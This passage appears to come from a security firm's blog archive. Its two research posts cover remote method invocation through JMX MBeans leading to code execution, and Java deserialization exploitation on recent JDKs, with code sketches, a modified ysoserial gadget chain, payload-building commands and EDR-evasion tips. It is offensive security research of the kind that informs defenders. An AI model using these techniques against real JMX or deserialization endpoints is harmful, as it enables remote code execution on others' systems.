And then there are also JMX exploitation tools such as mjet (formerly also known as sjet, also by Hans-Martin Münch) and beanshooter by my colleague Tobias Neitzel, both of which can be used to exploit known vulnerabilities in JMX services and MBeans.

However, some aspects are either no longer possible in current Java versions (e. g., pre-authenticated arbitrary Java deserialization via RMIServer.newClient(Object)) or they require certain MBeans to be present or certain conditions to hold, such as the server being able to connect back to the attacker (e. g., MLet with an HTTP URL).

In this blog post we will look into two other default MBean classes that can be leveraged for pretty unexpected behavior:

  • remote invocation of arbitrary instance methods on arbitrary serializable objects
  • remote invocation of arbitrary static methods on arbitrary classes

Tobias has implemented some of the gained insights into his tool beanshooter. Thanks!

Read The Fine Manual

By default, MBean classes are required to fulfill one of the following:

  1. follow certain design patterns
  2. implement certain interfaces

For example, the javax.management.loading.MLet class implements the javax.management.loading.MLetMBean interface, which fulfills the first requirement: the class implements an interface of the same name ending with MBean.

The two specific MBean classes we will be looking at fulfill the second requirement:

Both classes provide features that don't seem to have gotten much attention yet, but are pretty powerful and allow interaction with the MBean server and MBeans that may even violate the JMX specification.

The Standard MBean Class StandardMBean

The StandardMBean was added to JMX 1.2 with the following description:

[…] the javax.management.StandardMBean class can be used to define standard MBeans with an interface whose name is not necessarily related to the class name of the MBean.

– Java™ Management Extensions (JMX™) (Maintenance Release 2)

Also:

An MBean whose management interface is determined by reflection on a Java interface.

– StandardMBean (Java Platform SE 8)

Here reflection is used to determine the attributes and operations based on the given interface class and the JavaBeans™ conventions.

That basically means that we can create MBeans for arbitrary classes and call methods on them that are defined by the interfaces they implement. The only restriction is that the class needs to be Serializable, as well as any possible arguments we want to use in the method call.

public final class TemplatesImpl implements Templates, Serializable

Meet the infamous TemplatesImpl! It is an old acquaintance common in Java deserialization gadgets as it is serializable and calling any of the following public methods results in loading of a class from byte code embedded in the private field _bytecodes:

  • TemplatesImpl.getOutputProperties()
  • TemplatesImpl.getTransletIndex()
  • TemplatesImpl.newTransformer()

The first and last methods are actually defined in the javax.xml.transform.Templates interface that TemplatesImpl implements. The getOutputProperties() method also fulfills the requirements for an MBean attribute getter method, which makes it a perfect trigger for serializers calling getter methods during the process of deserialization.

In this case it means that we can call these Templates interface methods remotely and thereby achieve arbitrary Remote Code Execution in the JMX service process:

Here we even have the choice to either read the attribute OutputProperties (resulting in an invocation of getOutputProperties()) or to invoke getOutputProperties() or newTransformer() directly.
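Sketched with the plain JMX client API, the remote interaction could look roughly like this (assumptions: conn is an established MBeanServerConnection and templatesGadget is a pre-built, serializable TemplatesImpl carrying the attacker's byte code; the constructor signature strings may need adjusting):

import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.xml.transform.Templates;

public class StandardMBeanSketch {

    // conn: established MBeanServerConnection; templatesGadget: serializable TemplatesImpl gadget
    public static void deployAndTrigger(MBeanServerConnection conn, Templates templatesGadget) throws Exception {
        ObjectName name = new ObjectName("Attacker:type=StandardMBean");

        // Create a StandardMBean on the server that wraps the serializable TemplatesImpl;
        // the management interface is derived from javax.xml.transform.Templates.
        conn.createMBean(
            "javax.management.StandardMBean",
            name,
            new Object[] { templatesGadget, Templates.class },
            new String[] { "java.lang.Object", "java.lang.Class" });

        // Either read the OutputProperties attribute (invokes getOutputProperties()) ...
        conn.getAttribute(name, "OutputProperties");

        // ... or invoke one of the interface methods directly.
        conn.invoke(name, "newTransformer", new Object[0], new String[0]);
    }
}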

The Model MBean Class RequiredModelMBean

The javax.management.modelmbean.RequiredModelMBean is already part of JMX since 1.0 and is even more versatile than the StandardMBean:

This model MBean implementation is intended to provide ease of use and extensive default management behavior for the instrumentation.

– Java™ Management Extensions Instrumentation and Agent Specification, v1.0

Also:

Java resources wishing to be manageable instantiate the RequiredModelMBean using the MBeanServer's createMBean method. The resource then sets the MBeanInfo and Descriptors for the RequiredModelMBean instance. The attributes and operations exposed via the ModelMBeanInfo for the ModelMBean are accessible from MBeans, connectors/adaptors like other MBeans. […]

– RequiredModelMBean (Java Platform SE 8)

So instead of having the wrapping MBean class use reflection to retrieve the MBean information from the interface class, a RequiredModelMBean allows specifying the set of attributes, operations, etc. by providing a ModelMBeanInfo with corresponding ModelMBeanAttributeInfo, ModelMBeanOperationInfo, etc.

That means, we can define what public instance attribute getters, setters, or regular methods we want to be invokable remotely.

Invoking Arbitrary Instance Methods

We can even define methods that do not fulfill the JavaBeans™ convention or the MBean design patterns, as this example with java.io.File demonstrates:

This works with every serializable object and public instance method. Arguments also need to be serializable. Return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.

Invoking Arbitrary Static Methods

While working on the implementation of some of the insights described here into beanshooter, Tobias pointed out that it is also possible to invoke static methods on arbitrary classes.

At first I was baffled because, when reading the implementation of RequiredModelMBean.invoke(String, Object[], String[]), there is no way to have targetObject be null. And my assumption was that, for calling static methods, the object instance provided as first argument to Method.invoke(Object, Object...) must be null. However, I figured that my assumption was entirely wrong after reading the manual:

If the underlying method is static, then the specified obj argument is ignored. It may be null.

– Method.invoke(Object, Object...) (Java Platform SE 8)

Furthermore, it is not even required that the method is declared in a serializable class but any static method of any class can be specified! Awesome finding, Tobias!

So, for calling static methods, an additional Descriptor instance needs to be provided to the ModelMBeanOperationInfo constructor which holds a class field with the targeted class name.

The provided class field is read in RequiredModelMBean.invoke(String, Object[], String[]) and overrides the target class variable, which otherwise would be obtained by calling getClass() on the resource object.

So, for instance, for creating a ModelMBeanOperationInfo for System.setProperty(String, String), the following can be used:
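A rough sketch of what such a ModelMBeanOperationInfo could look like (the Descriptor's class field names the class declaring the static method; the exact set of descriptor fields is an assumption following the Model MBean conventions):

import javax.management.Descriptor;
import javax.management.MBeanOperationInfo;
import javax.management.MBeanParameterInfo;
import javax.management.modelmbean.DescriptorSupport;
import javax.management.modelmbean.ModelMBeanOperationInfo;

// Descriptor with a "class" field pointing at the class that declares the static method
Descriptor descriptor = new DescriptorSupport(
    "name=setProperty",
    "descriptorType=operation",
    "role=operation",
    "class=java.lang.System");

ModelMBeanOperationInfo setPropertyInfo = new ModelMBeanOperationInfo(
    "setProperty",                                   // operation name
    "java.lang.System.setProperty(String, String)",  // description
    new MBeanParameterInfo[] {
        new MBeanParameterInfo("key",   "java.lang.String", "property name"),
        new MBeanParameterInfo("value", "java.lang.String", "property value")
    },
    "java.lang.String",                              // return type
    MBeanOperationInfo.ACTION,                       // impact
    descriptor);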

As already said, for calling the static method, the resource managed by RequiredModelMBean can be any arbitrary serializable instance. So even a String suffices.

This works with any public static method regardless of the class it is declared in. But again, provided argument values still need to be serializable. And return values can only be retrieved if they are also serializable, however, this is not a requirement for invoking a method in the first place.

Conclusion

Even though exploitation of JMX is generally well understood and comprehensively researched, apparently no one had looked into the aspects described here.

So check your assumptions! Don't take things for granted, even when it seems everyone has already looked into it. Dive deep to understand it fully. You might be surprised.

Java Exploitation Restrictions in Modern JDK Times

11 April 2023 at 13:12
Java deserialization gadgets have a long history in the context of vulnerability research, going back at least to the year 2015. One of the most popular tools providing a large set of different gadgets is ysoserial by Chris Frohoff. Recently, we observed increasing concerns from the community about why several gadgets do not seem to work anymore with more recent JDK versions. In this blog post we try to summarize certain facts to re-enable some capabilities which seemed to be broken. But our journey did not begin with deserialization in the first place, but rather with looking for alternative ways of executing Java code in recent JDK versions. In this blog post, we'll focus on the OpenJDK and Oracle implementations. Defenders should adjust their search patterns to these alternative code execution patterns accordingly.

ScriptEngineManager - It's Gone

Initially, our problems began on another exploitation track not related to deserialization. Code execution payloads in Java often end with a final call to java.lang.Runtime.getRuntime().exec(args), at least in a proof-of-concept exploitation phase. But as a Red Team, we always try to maintain a low profile and avoid actions that may raise suspicion, like spawning new (child) processes. This is a well-known and still hot topic discussed in the context of C2 frameworks today, especially when it comes to AV/EDR evasion techniques. But it can also be applied to Java exploitation. It is a well-known fact that an attacker has the choice between different approaches to stay within the JVM to execute arbitrary Java code, with new javax.script.ScriptEngineManager().getEngineByName(engineName).eval(scriptCode) probably being the most popular one over the last years. The input code used is usually JavaScript, executed by whichever referenced ScriptEngine is available, e.g. Nashorn (or Rhino).

But since Nashorn was marked as deprecated in Java 11 (JEP 335) and removed entirely in Java 15 (JEP 372), a target using a JDK version >= 15 won't process JavaScript payloads anymore by default. Instead of hoping for other JavaScript engines manually added by developers for a specific target, we can make use of a "new" Java code evaluation API: JShell, a read-eval-print loop (REPL) tool that was introduced with Java 9 (JEP 222). Mainly used via its command line interface (CLI) for testing Java code snippets, it allows programmatic access as well (see the JShell API). This new evaluation call reads like jdk.jshell.JShell.create().eval(javaCode), executing Java code snippets (not JavaScript!). Further call variants exist, too. We found this being mentioned already in 2019 in the context of a SpEL injection payload. This all sounded too good to be true, but nevertheless some restrictions seemed to apply.

"The input should be exactly one complete snippet of source code, that is, one expression, statement, variable declaration, method declaration, class declaration, or import."

So, we started to play with some Java code snippets using the JShell API. First, we realized that it is indeed possible to use import statements within such snippets, but interestingly the subsequent statements were not executed anymore. This should have been expected after reading the quote above: one is actually restricted to a single statement per snippet.

We also learned that there is a huge difference between using the CLI and using the API programmatically. The jshell CLI tool supports the listing of pre-imported packages:

I.e. a code snippet in the CLI executing Files.createFile(java.nio.file.Paths.get("/tmp/RCE")); works just fine. Calling the eval method programmatically on a JShell instance instead gives a different result, namely that Files is not known in this context. As a side note, eval calls do not return any exception messages printed to stdout/stderr. For "debugging" purposes, the diagnostics method helps a lot: jshell.diagnostics(events.get(0).snippet()).forEach(x -> System.out.println(x.getMessage(Locale.ENGLISH)));.

Thus, it seems that we don't have access to a lot of "useful" classes with the programmatic approach. But as you might already have guessed, fully qualified class names can be used as well. We don't have to "fix" the import issue mentioned above but can still use all built-in JDK classes by referencing them accordingly: java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));. This gives us all the power needed to build (almost) arbitrary Java code payloads for exfiltrating data, putting them into a server response, etc.
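Putting it together, a minimal programmatic JShell evaluation with diagnostics output might look like this sketch:

import java.util.List;
import java.util.Locale;
import jdk.jshell.JShell;
import jdk.jshell.SnippetEvent;

public class JShellSketch {
    public static void main(String[] args) {
        JShell jshell = JShell.create();

        // use fully qualified class names; the pre-imports of the jshell CLI are not available here
        List<SnippetEvent> events = jshell.eval(
            "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));");

        // eval() does not surface errors itself; use diagnostics() to see what went wrong, if anything
        jshell.diagnostics(events.get(0).snippet())
              .forEach(d -> System.out.println(d.getMessage(Locale.ENGLISH)));
    }
}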

Ysoserial - The Possible

Besides the fact that we can now benefit from this approach to inject these kinds of payloads in various attack scenarios, this blog post should also be about insecure deserialization exploitation. Starting with the well-known gadget CommonsCollections6, the original Runtime.getRuntime().exec(args) call will be replaced with a JShell variant. Using the handy TransformerChain pattern, one simply has to replace the chain accordingly, roughly as sketched below.
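The replaced chain could look roughly like the following sketch (javaCode holds the Java snippet to evaluate; the reflective getMethod/invoke detour mirrors the original Runtime.getRuntime().exec() chain):

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

String javaCode = "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));";

final Transformer[] transformers = new Transformer[] {
    new ConstantTransformer(jdk.jshell.JShell.class),
    // JShell.create() instead of Runtime.getRuntime()
    new InvokerTransformer("getMethod",
        new Class[]  { String.class, Class[].class },
        new Object[] { "create", new Class[0] }),
    new InvokerTransformer("invoke",
        new Class[]  { Object.class, Object[].class },
        new Object[] { null, new Object[0] }),
    // JShell.eval(javaCode) instead of Runtime.exec(cmd)
    new InvokerTransformer("eval",
        new Class[]  { String.class },
        new Object[] { javaCode })
};

Transformer transformerChain = new ChainedTransformer(transformers);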


After a small adjustment to the pom.xml, we're ready to rebuild the ysoserial package with Maven. But creating a payload with a recent JDK version (version 17 in our case) revealed the following error.

In JDK 9, the Java Platform Module System (JPMS) was introduced, based on the "historical" project Jigsaw. We highly recommend the reader to look through the historical timeline with the corresponding JEPs in this IBM Java tutorial. E.g. JEP 260 describes that most internal JDK APIs should be encapsulated properly such that getters and setters have to be used for access to or modification of otherwise privately declared internal member variables. Also, the new Java module structure explicitly restricts access between different modules, i.e. declaring lists of exported packages becomes a "must" to allow inter-module access via the new module descriptor module-info.java. Additionally, since JDK 16 the default strategy with respect to the Java Reflection API is "deny by default" (JEP 396).
The CommonsCollections library is not implemented as a Java module, so by definition it falls into the category of unnamed modules (compare with the exception message above).

Browsing through the ysoserial GitHub issue tracker, it appears people have run into similar problems recently. One of the best articles explaining this kind of issue comes from Oracle itself. The chapter "Illegal Reflective Access" nicely summarizes the adjustments to JDK versions with respect to access of otherwise inaccessible members between packages via the Java Reflection API.

"Some tools and libraries use reflection to access parts of the JDK that are meant for internal use only. This is called illegal reflective access and by default is not permitted in JDK 16 and later.
...
Code that uses reflection to access private fields of exported java.* APIs will no longer work by default. The code will throw an InaccessibleObjectException."

Furthermore, Oracle states that

"If you need to use an internal API that has been made inaccessible, then use the --add-exports runtime option. You can also use --add-exports at compile time to access internal APIs. 

If you have to allow code on the class path to do deep reflection to access nonpublic members, then use the --add-opens option."

Since CommonsCollections6 (and most other gadgets) makes heavy use of the Java Reflection API via java.lang.reflect.Field.setAccessible(boolean flag), this restriction has to be taken into account accordingly. Oracle already gave the solution above. Note that the --add-exports parameter does not allow "deep reflection", i.e. access to otherwise private members. So, creating the payload using java --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "java.nio.file.Files.createFile(java.nio.file.Paths.get(\"/tmp/RCE\"));" works just fine and gives code execution in insecure deserialization sinks again.

Ysoserial - The Impossible

Another popular gadget is CommonsBeanutils1, still frequently used these days to gain code execution through insecure deserialization. A short side note: this gadget chain uses Gadgets.createTemplatesImpl(cmd) to put your command into a Java statement, which is then compiled into byte code and executed later. Chris Frohoff already gave a nice hint in his code that instead of the java.lang.Runtime.getRuntime().exec(cmd) call, one "[...] could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections". That's already a powerful primitive which might not have been used by too many people over the last years (at least it has not been made public as a popular choice).

But let's get back to trying to create a payload with JDK 17, which unfortunately results in a different exception compared to CommonsCollections6.

This kind of error is expected, cross-checking with the Oracle article mentioned above, and can therefore be solved with the same approach: java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "[JAVA_CODE]" (see also Chris Frohoff's comment on an issue).

You might be aware of the Deserializer test class in ysoserial. It can be run by piping the payload creation result directly into java -cp ./target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer. You should first test this with our CommonsCollections6 case above. But what if we do this with our successfully created CommonsBeanutils1 gadget?

Sounds familiar? Unfortunately, this scenario is equivalent to server-side deserialization processing, i.e. no code execution! If you add the --add-opens parameters to the ysoserial.Deserializer call as well, deserialization works as expected of course, but in a remote attack scenario we obviously don't have control over this!

Since org.apache.commons.beanutils.PropertyUtilsBean tries to access com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, traditional paths in gadget chains like TemplatesImpl turn out to be useless in most cases. This, again, is because third-party libraries known from ysoserial are not Java modules and the module system strongly protects internal JDK classes. If we check the module-info.java in the JDK's java.xml/share/classes/ directory, no exports can be found matching the needed package names. Game over.

Conclusions

  • Use JShell instead of ScriptEngineManager for JDK versions >= 15 (side note: JShell is not available in JREs!). This is also relevant for defenders searching for code execution patterns based only on Runtime.getRuntime().exec or ScriptEngineManager().getEngineByName(engineName).eval calls. Keep in mind, this already affects JDK versions >= 9.
  • For JDK versions < 16, use the --add-opens options during payload creation.
  • For JDK versions >= 16, rely on known (or find new) Java deserialization gadgets which do not depend on access to internal JDK class members etc. However, check for the exported namespaces before giving up a certain gadget chain.

Blog moved to https://code-white.com/blog

5 July 2023 at 08:09

Hey,

we've moved our tech blog to our own homepage at https://code-white.com/blog. From now on, all fresh posts will go up there. We've also copied over all the old articles, so you won't miss anything. And don't worry, the existing Blogspot posts will remain intact to keep the existing links working. But from now on, make sure to check out https://code-white.com/blog and, if you're interested, our all new public vulnerabilities list.

See you there,
The CODE WHITE Team
